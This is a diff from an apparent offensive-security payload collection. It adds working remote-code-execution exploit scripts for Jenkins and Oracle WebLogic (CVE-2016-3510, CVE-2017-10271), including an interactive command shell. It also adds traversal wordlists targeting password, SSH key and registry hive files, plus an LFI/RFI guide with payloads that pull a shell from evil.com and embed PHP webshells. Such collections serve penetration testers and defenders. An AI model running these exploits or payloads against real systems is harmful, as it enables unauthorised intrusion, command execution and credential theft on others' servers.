              <redirectErrorStream>false</redirectErrorStream>
            </owner>
            <resolveStrategy>0</resolveStrategy>
            <directive>0</directive>
            <parameterTypes/>
            <maximumNumberOfParameters>0</maximumNumberOfParameters>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
   <int>1</int>
 </entry>
 </map>'''.format(xml_formatted.strip())
 print '[*] Generated XML payload:'
 print xml_payload
 print 
 print '[*] Sending payload'
 headers = {'Content-Type': 'text/xml'}
 r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)
 paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml']
 if r.status_code == 500:
    for path in paths_in_trace:
        if path in r.text:
            print '[+] Command executed successfully'
            break
--- a/CVE-2017-12617.py
+++ b/CVE-2017-12617.py
--- a/Exploits/WebLogic
+++ b/Exploits/WebLogic
@@ -0,0 +1,71 @@
 #!/usr/bin/env python2
 #Oracle WebLogic Server Java Object Deserialization RCE (CVE-2016-3510)
 #Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)
 #Made with <3 by @byt3bl33d3r
 import socket
 import struct
 import argparse
 import os
 import sys
 from subprocess import check_output
 ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
 ysoserial_path = None
 parser = argparse.ArgumentParser()
 parser.add_argument('target', type=str, help='Target IP:PORT')
 parser.add_argument('command', type=str, help='Command to run on target')
 parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
 if len(sys.argv) < 2:
    parser.print_help()
    sys.exit(1)
 args = parser.parse_args()
 if not args.ysoserial_path:
    for path in ysoserial_default_paths:
        if os.path.exists(path):
            ysoserial_path = path
 else:
    if os.path.exists(args.ysoserial_path):
        ysoserial_path = args.ysoserial_path
 if len(args.target.split(':')) != 2:
    print '[-] Target must be in format IP:PORT'
    sys.exit(1)
 if not args.command:
    print '[-] You must specify a command to run'
    sys.exit(1)
 ip, port = args.target.split(':')
 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 print '[*] Target IP: {}'.format(ip)
 print '[*] Target PORT: {}'.format(port)
 sock.connect((ip, int(port)))
 # Send headers
 headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
 print '[*] Sending header'
 sock.sendall(headers)
 data = sock.recv(1024)
 print'[*] Received: "{}"'.format(data)
 payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
 payload = '\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
 payload += payloadObj
 payload += '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
 # adjust header for appropriate message length
 payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:])
 print '[*] Sending payload'
 sock.send(payload)
--- a/CVE-2017-10271.py
+++ b/CVE-2017-10271.py
@@ -0,0 +1,61 @@
 import requests
 import sys
 url_in = sys.argv[1]
 payload_url = url_in + "/wls-wsat/CoordinatorPortType"
 payload_header = {'content-type': 'text/xml'}
 def payload_command (command_in):
    html_escape_table = {
        "&": "&amp;",
        '"': "&quot;",
        "'": "&apos;",
        ">": "&gt;",
        "<": "&lt;",
    }
    command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
    payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
                "   <soapenv:Header> " \
                "       <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
                "           <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
                "               <void class=\"java.lang.ProcessBuilder\"> \n" \
                "                  <array class=\"java.lang.String\" length=\"3\">" \
                "                      <void index = \"0\">                       " \
                "                          <string>cmd</string>                 " \
                "                      </void>                                    " \
                "                      <void index = \"1\">                       " \
                "                          <string>/c</string>                  " \
                "                      </void>                                    " \
                "                      <void index = \"2\">                       " \
                + command_filtered + \
                "                      </void>                                    " \
                "                  </array>" \
                "                  <void method=\"start\"/>" \
                "                  </void>" \
                "            </java>" \
                "        </work:WorkContext>" \
                "   </soapenv:Header>" \
                "   <soapenv:Body/>" \
                "</soapenv:Envelope>"
    return payload_1
 def do_post(command_in):
    result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
    if result.status_code == 500:
        print "Command Executed \n"
    else:
        print "Something Went Wrong \n"
 print "***************************************************** \n" \
       "****************   Coded By 1337g  ****************** \n" \
       "*  CVE-2017-10271 Blind Remote Command Execute EXP  * \n" \
       "***************************************************** \n"
 while 1:
    command_in = raw_input("Eneter your command here: ")
    if command_in == "exit" : exit(0)
    do_post(command_in)
--- a/Exploits/WebLogic
+++ b/Exploits/WebLogic
--- a/Exploits/WebSphere
+++ b/Exploits/WebSphere
--- a/Traversal/Intruders/BSD-files.txt
+++ b/Traversal/Intruders/BSD-files.txt
@@ -0,0 +1,13 @@
 /usr/pkg/etc/httpd/httpd.conf
 /usr/local/etc/apache22/httpd.conf
 /usr/local/etc/apache2/httpd.conf
 /var/www/conf/httpd.conf
 /var/www/logs/error_log
 /var/www/logs/access_log
 /etc/apache2/httpd2.conf
 /var/apache2/logs/error_log
 /var/apache2/logs/access_log
 /var/log/httpd-error.log
 /var/log/httpd-access.log
 /var/log/httpd/error_log
 /var/log/httpd/access_log
--- a/Traversal/Intruders/LFI-LogFileCheck.txt
+++ b/Traversal/Intruders/LFI-LogFileCheck.txt
@@ -1,49 +0,0 @@
 /etc/passwd
 /apache/logs/access.log
 /apache/logs/error.log
 /apache2/logs/error.log
 /apache2/logs/access.log
 /etc/httpd/logs/access.log
 /etc/httpd/logs/access_log
 /etc/httpd/logs/error_log
 /etc/httpd/logs/error.log
 /logs/error.log
 /logs/access.log
 /logs/error_log
 /logs/access_log
 /usr/local/apache/logs/access_log
 /usr/local/apache/logs/access.log
 /usr/local/apache/logs/error_log
 /usr/local/apache/logs/error.log
 /usr/local/apache2/logs/access_log
 /usr/local/apache2/logs/access.log
 /usr/local/apache2/logs/error_log
 /usr/local/apache2/logs/error.log
 /var/log/access_log
 /var/log/access.log
 /var/log/error_log
 /var/log/error.log
 /var/log/apache/access_log
 /var/log/apache/error.log
 /var/log/apache2/access_log
 /var/log/apache2/error.log
 /var/log/httpd/access_log
 /var/log/httpd/error_log
 /var/log/httpd/access_log
 /var/log/httpd/error_log
 /var/www/logs/error_log
 /var/www/logs/error.log
 /var/www/logs/access_log
 /var/www/logs/access.log
 /var/www/mgr/logs/error_log
 /var/www/mgr/logs/error.log
 /var/www/mgr/logs/access_log
 /var/www/mgr/logs/access.log
 /opt/lampp/logs/access_log
 /opt/lampp/logs/access.log
 /opt/lampp/logs/error_log
 /opt/lampp/logs/error.log
 /opt/xampp/logs/access_log
 /opt/xampp/logs/access.log
 /opt/xampp/logs/error_log
 /opt/xampp/logs/error.log
--- a/Traversal/Intruders/Linux-files.txt
+++ b/Traversal/Intruders/Linux-files.txt
@@ -0,0 +1,58 @@
 /etc/passwd
 /etc/group
 /etc/hosts
 /etc/motd
 /etc/issue
 /etc/bashrc
 /etc/apache2/apache2.conf
 /etc/apache2/ports.conf
 /etc/apache2/sites-available/default
 /etc/httpd/conf/httpd.conf
 /etc/httpd/conf.d
 /etc/httpd/logs/access.log
 /etc/httpd/logs/access_log
 /etc/httpd/logs/error.log
 /etc/httpd/logs/error_log
 /etc/init.d/apache2
 /etc/mysql/my.cnf
 /etc/nginx.conf
 /opt/lampp/logs/access_log
 /opt/lampp/logs/error_log
 /opt/lamp/log/access_log
 /opt/lamp/logs/error_log
 /proc/self/environ
 /proc/version
 /proc/cmdline
 /proc/mounts
 /proc/config.gz
 /root/.bashrc
 /root/.bash_history
 /root/.ssh/authorized_keys
 /root/.ssh/id_rsa
 /root/.ssh/id_rsa.keystore
 /root/.ssh/id_rsa.pub
 /root/.ssh/known_hosts
 /usr/local/apache/htdocs/index.html
 /usr/local/apache/conf/httpd.conf
 /usr/local/apache/conf/extra/httpd-ssl.conf
 /usr/local/apache/logs/error_log
 /usr/local/apache/logs/access_log
 /usr/local/apache/bin/apachectl
 /usr/local/apache2/htdocs/index.html
 /usr/local/apache2/conf/httpd.conf
 /usr/local/apache2/conf/extra/httpd-ssl.conf
 /usr/local/apache2/logs/error_log
 /usr/local/apache2/logs/access_log
 /usr/local/apache2/bin/apachectl
 /usr/local/etc/nginx/nginx.conf
 /usr/local/nginx/conf/nginx.conf
 /var/apache/logs/access_log
 /var/apache/logs/access.log
 /var/apache/logs/error_log
 /var/apache/logs/error.log
 /var/log/apache/access.log
 /var/log/apache/access_log
 /var/log/apache/error.log
 /var/log/apache/error_log
 /var/log/httpd/error_log
 /var/log/httpd/access_log
--- a/Traversal/Intruders/Logs-files.txt
+++ b/Traversal/Intruders/Logs-files.txt
@@ -0,0 +1 @@
 71
--- a/Traversal/Intruders/Mac-files.txt
+++ b/Traversal/Intruders/Mac-files.txt
@@ -0,0 +1,6 @@
 /etc/apache2/httpd.conf
 /Library/WebServer/Documents/index.html
 /private/var/log/appstore.log
 /var/log/apache2/error_log
 /var/log/apache2/access_log
 /usr/local/nginx/conf/nginx.conf
--- a/Traversal/Intruders/Web-files.txt
+++ b/Traversal/Intruders/Web-files.txt
@@ -0,0 +1,13 @@
 /robots.txt
 /humans.txt
 /style.css
 /configuration.php
 wp-login.php
 wp-admin.php
 /wp-content/plugins
 /include/config.php
 /inc/config.php
 /include/mysql.php
 /inc/mysql.php
 /sites/defaults/settings.php
 /phpmyadmin/changelog.php
--- a/Traversal/Intruders/Windows-files.txt
+++ b/Traversal/Intruders/Windows-files.txt
@@ -0,0 +1,212 @@
 C:/$recycle.bin/s-1-5-18/desktop.ini
 C:/apache2/log/access.log
 C:/apache2/log/access_log
 C:/apache2/log/error.log
 C:/apache2/log/error_log
 C:/apache2/logs/access.log
 C:/apache2/logs/access_log
 C:/apache2/logs/error.log
 C:/apache2/logs/error_log
 C:/apache/log/access.log
 C:/apache/log/access_log
 C:/apache/log/error.log
 C:/apache/log/error_log
 C:/apache/logs/access.log
 C:/apache/logs/access_log
 C:\apache\logs\access.log
 C:/apache/logs/error.log
 C:/apache/logs/error_log
 C:\apache\logs\error.log
 C:/apache/php/php.ini
 C:/boot.ini
 C:\boot.ini
 C:/documents and settings/administrator/desktop/desktop.ini
 C:/documents and settings/administrator/ntuser.dat
 C:/documents and settings/administrator/ntuser.ini
 C:/home2/bin/stable/apache/php.ini
 C:/home/bin/stable/apache/php.ini
 C:/inetpub/logs/logfiles
 C:/inetpub/wwwroot/global.asa
 C:/inetpub/wwwroot/index.asp
 C:/inetpub/wwwroot/web.config
 C:/log/access.log
 C:/log/access_log
 C:/log/error.log
 C:/log/error_log
 C:/log/httpd/access_log
 C:/log/httpd/error_log
 C:/logs/access.log
 C:/logs/access_log
 C:/logs/error.log
 C:/logs/error_log
 C:/logs/httpd/access_log
 C:/logs/httpd/error_log
 C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT
 C:/mysql/bin/my.ini
 C:/mysql/data/hostname.err
 C:/mysql/data/mysql.err
 C:/mysql/data/mysql.log
 C:/mysql/my.cnf
 C:/mysql/my.ini
 C:\nginx-1.7.4\conf\nginx.conf
 C:\nginx-1.7.4\nginx.conf
 C:/opt/xampp/logs/access.log
 C:/opt/xampp/logs/access_log
 C:/opt/xampp/logs/error.log
 C:/opt/xampp/logs/error_log
 C:/php4/php.ini
 C:/php4/sessions/
 C:/php5/php.ini
 C:/php5/sessions/
 C:/php/php.ini
 C:/php/sessions/
 C:/program files/apache group/apache2/conf/httpd.conf
 C:/program files/apachegroup/apache2/conf/httpd.conf
 C:/programfiles/apachegroup/apache2/conf/httpd.conf
 C:/program files/apache group/apache/conf/httpd.conf
 C:/program files/apachegroup/apache/conf/httpd.conf
 C:/programfiles/apachegroup/apache/conf/httpd.conf
 C:/program files/apache group/apache/logs/access.log
 C:/program files/apache group/apache/logs/error.log
 C:\Program Files\Apache Software Foundation\Apache2.2\conf\httpd.conf
 C:\Program Files\Apache Software Foundation\Apache2.2\logs\access.log
 C:\Program Files\Apache Software Foundation\Apache2.2\logs\error.log
 C:/program files/filezilla server/filezilla server.xml
 C:/program files/mysql/data/hostname.err
 C:/program files/mysql/data/mysql-bin.log
 C:/program files/mysql/data/mysql.err
 C:/program files/mysql/data/mysql.log
 C:/program files/mysql/my.cnf
 C:/program files/mysql/my.ini
 C:/program files/mysql/mysql server 5.0/data/hostname.err
 C:/program files/mysql/mysql server 5.0/data/mysql-bin.log
 C:/program files/mysql/mysql server 5.0/data/mysql.err
 C:/program files/mysql/mysql server 5.0/data/mysql.log
 C:/program files/mysql/mysql server 5.0/my.cnf
 C:/program files/mysql/mysql server 5.0/my.ini
 C:/program files/mysql/mysql server 5.1/my.ini
 C:/program files (x86)/apache group/apache2/conf/httpd.conf
 C:/program files (x86)/apache group/apache/conf/access.log
 C:/program files (x86)/apache group/apache/conf/error.log
 C:/program files (x86)/apache group/apache/conf/httpd.conf
 C:/program files (x86)/filezilla server/filezilla server.xml
 C:/program files (x86)/xampp/apache/conf/httpd.conf
 C:/program files/xampp/apache/conf/httpd.conf
 C:/programfiles/xampp/apache/conf/httpd.conf
 C:/program files/xampp/apache/conf/httpd.confetc/passwd
 C:/sysprep.inf
 C:/sysprep/sysprep.inf
 C:/sysprep/sysprep.xml
 C:/sysprep.xml
 C:/system32/inetsrv/metabase.xml
 C:/system volume information/wpsettings.dat
 C:/unattended.txt
 C:/unattended.xml
 C:/unattend.txt
 C:/unattend.xml
 C:/users/administrator/desktop/desktop.ini
 C:/users/administrator/ntuser.dat
 C:/users/administrator/ntuser.ini
 C:\wamp\apache2\logs\access.log
 C:\wamp\apache2\logs\access_log
 C:\wamp\apache2\logs\error.log
 C:\wamp\apache2\logs\error_log
 C:\wamp\logs\access.log
 C:\wamp\logs\access_log
 C:\wamp\logs\error.log
 C:\wamp\logs\error_log
 C:/windows/csc/v2.0.6/pq
 C:/windows/csc/v2.0.6/sm
 C:/windows/debug/netsetup.log
 C:/windows/explorer.exe
 C:/windows/iis6.log
 C:/windows/iis6.log (5,6 or 7)
 C:/windows/iis7.log
 C:/windows/iis8.log
 C:/windows/notepad.exe
 C:/windows/panther/setupinfo
 C:/windows/panther/setupinfo.bak
 C:/windows/panther/sysprep.inf
 C:/windows/panther/sysprep.xml
 C:/windows/panther/unattended.txt
 C:/windows/panther/unattended.xml
 C:/windows/panther/unattend/setupinfo
 C:/windows/panther/unattend/setupinfo.bak
 C:/windows/panther/unattend/sysprep.inf
 C:/windows/panther/unattend/sysprep.xml
 C:/windows/panther/unattend.txt
 C:/windows/panther/unattend/unattended.txt
 C:/windows/panther/unattend/unattended.xml
 C:/windows/panther/unattend/unattend.txt
 C:/windows/panther/unattend/unattend.xml
 C:/windows/panther/unattend.xml
 C:/windows/php.ini
 C:/windows/repair/sam
 C:/windows/repair/security
 C:/windows/repair/software
 C:/windows/repair/system
 C:/windows/system32/config/appevent.evt
 C:/windows/system32/config/default.sav
 C:/windows/system32/config/regback/default
 C:/windows/system32/config/regback/sam
 C:/windows/system32/config/regback/security
 C:/windows/system32/config/regback/software
 C:/windows/system32/config/regback/system
 C:/windows/system32/config/sam
 C:/windows/system32/config/secevent.evt
 C:/windows/system32/config/security.sav
 C:/windows/system32/config/software.sav
 C:/windows/system32/config/system
 C:/windows/system32/config/system.sa
 C:/windows/system32/config/system.sav
 C:/windows/system32/drivers/etc/hosts
 C:/windows/system32/eula.txt
 C:/windows/system32/inetsrv/config/applicationhost.config
 C:/windows/system32/inetsrv/config/schema/aspnet_schema.xml
 C:/windows/system32/license.rtf
 C:/windows/system32/logfiles/httperr/httperr1.log
 C:/windows/system32/sysprep.inf
 C:/windows/system32/sysprepsysprep.inf
 C:/windows/system32/sysprep/sysprep.xml
 C:/windows/system32/sysprepsysprep.xml
 C:/windows/system32/sysprepunattended.txt
 C:/windows/system32/sysprepunattended.xml
 C:/windows/system32/sysprepunattend.txt
 C:/windows/system32/sysprepunattend.xml
 C:/windows/system32/sysprep.xml
 C:/windows/system32/unattended.txt
 C:/windows/system32/unattended.xml
 C:/windows/system32/unattend.txt
 C:/windows/system32/unattend.xml
 C:/windows/system.ini
 C:/windows/temp/
 C:/windows/windowsupdate.log
 C:/windows/win.ini
 C:/winnt/php.ini
 C:/winnt/win.ini
 C:/xampp/apache/bin/php.ini
 C:/xampp/apache/conf/httpd.conf
 C:/xampp/apache/logs/access.log
 C:\xampp\apache\logs\access.log
 C:\xampp\apache\logs\access_log
 C:/xampp/apache/logs/error.log
 C:\xampp\apache\logs\error.log
 C:\xampp\apache\logs\error_log
 C:/xampp/filezillaftp/filezilla server.xml
 C:/xampp/filezillaftp/logs
 C:/xampp/filezillaftp/logs/access.log
 C:/xampp/filezillaftp/logs/error.log
 C:/xampp/mercurymail/logs/access.log
 C:/xampp/mercurymail/logs/error.log
 C:/xampp/mercurymail/mercury.ini
 C:/xampp/mysql/data/mysql.err
 C:/xampp/phpmyadmin/config.inc
 C:/xampp/phpmyadmin/config.inc.php
 C:/xampp/phpmyadmin/phpinfo.php
 C:/xampp/php/php.ini
 C:/xampp/sendmail/sendmail.ini
 C:/xampp/sendmail/sendmail.log
 C:/xampp/tomcat/conf/tomcat-users.xml
 C:/xampp/tomcat/conf/web.xml
 C:/xampp/webalizer/webalizer.conf
 C:/xampp/webdav/webdav.txt
--- a/Traversal/README.md
+++ b/Traversal/README.md
@@ -1,25 +1,29 @@
 # Local/Remote File Inclusion
 The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
 ## Summary
 * [Basic LFI](#basic-lfi)
 * [Basic RFI](#basic-rfi)
 * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
-  * [Wrapper php://filter]()
+  * [Wrapper php://filter](l#wrapper-phpfilter)
-  * [Wrapper zip://]()
+  * [Wrapper zip://](#wrapper-zip)
-  * [Wrapper data://]()
+  * [Wrapper data://](#wrapper-data)
-  * [Wrapper expect://]()
+  * [Wrapper expect://](#wrapper-expect)
-  * [Wrapper input://]()
+  * [Wrapper input://](#wrapper-input)
  * [Wrapper phar://](#wrapper-phar)
 * [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
 * [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
 * [LFI to RCE via upload](#lfi-to-rce-via-upload)
 * [LFI to RCE via upload (race)](#lfi-to-rce-via-upload-race)
 * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo)
 * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
 * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
 Linux - Interesting files to check out :
-Interesting files to check out :
+```powershell
 ```
 /etc/issue
 /etc/passwd
 /etc/shadow
@@ -38,8 +42,35 @@ Interesting files to check out :
 /proc/net/tcp
 /proc/net/udp
 ```
-The following log files are controllable and can be included with an evil payload to achieve a command execution
+
 Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
 ```powershell
 c:/boot.ini
 c:/inetpub/logs/logfiles
 c:/inetpub/wwwroot/global.asa
 c:/inetpub/wwwroot/index.asp
 c:/inetpub/wwwroot/web.config
 c:/sysprep.inf
 c:/sysprep.xml
 c:/sysprep/sysprep.inf
 c:/sysprep/sysprep.xml
 c:/system32/inetsrv/metabase.xml
 c:/sysprep.inf
 c:/sysprep.xml
 c:/sysprep/sysprep.inf
 c:/sysprep/sysprep.xml
 c:/system volume information/wpsettings.dat
 c:/system32/inetsrv/metabase.xml
 c:/unattend.txt
 c:/unattend.xml
 c:/unattended.txt
 c:/unattended.xml
 ```
 The following log files are controllable and can be included with an evil payload to achieve a command execution
 ```powershell
 /var/log/apache/access.log
 /var/log/apache/error.log
 /var/log/httpd/error_log
@@ -50,128 +81,213 @@ The following log files are controllable and can be included with an evil payloa
 /var/log/mail
 ```
 ## Basic LFI
-```
+
 ```powershell
 http://example.com/index.php?page=../../../etc/passwd
 ```
 Null byte
-```
+
 ```powershell
 http://example.com/index.php?page=../../../etc/passwd%00
 ```
 Double encoding
-```
+
 ```powershell
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
 ```
 Path truncation
-```
+
 ```powershell
 http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
 http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
 ```
 Filter bypass tricks
-```
+
 ```powershell
 http://example.com/index.php?page=....//....//etc/passwd
 http://example.com/index.php?page=..///////..////..//////etc/passwd
 http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
 ```
 ## Basic RFI
-```
+
 ```powershell
 http://example.com/index.php?page=http://evil.com/shell.txt
 ```
 Null byte
-```
+
 ```powershell
 http://example.com/index.php?page=http://evil.com/shell.txt%00
 ```
 Double encoding
-```
+
 ```powershell
 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
 ```
 ## LFI / RFI using wrappers
 ### Wrapper php://filter
 The part "php://filter" is case insensitive
-```
+
 ```powershell
 http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
 http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
 http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
 ```
 can be chained with a compression wrapper for large files.
-```
+
 ```powershell
 http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 ```
 NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s`
 ### Wrapper zip://
 ```python
 echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
-zip payload.zip payload.php;   
+zip payload.zip payload.php;
-mv payload.zip shell.jpg;    
+mv payload.zip shell.jpg;
-rm payload.php   
+rm payload.php
 http://example.com/index.php?page=zip://shell.jpg%23payload.php
 ```
 ### Wrapper data://
-```
+
 ```powershell
 http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
 NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
 ```
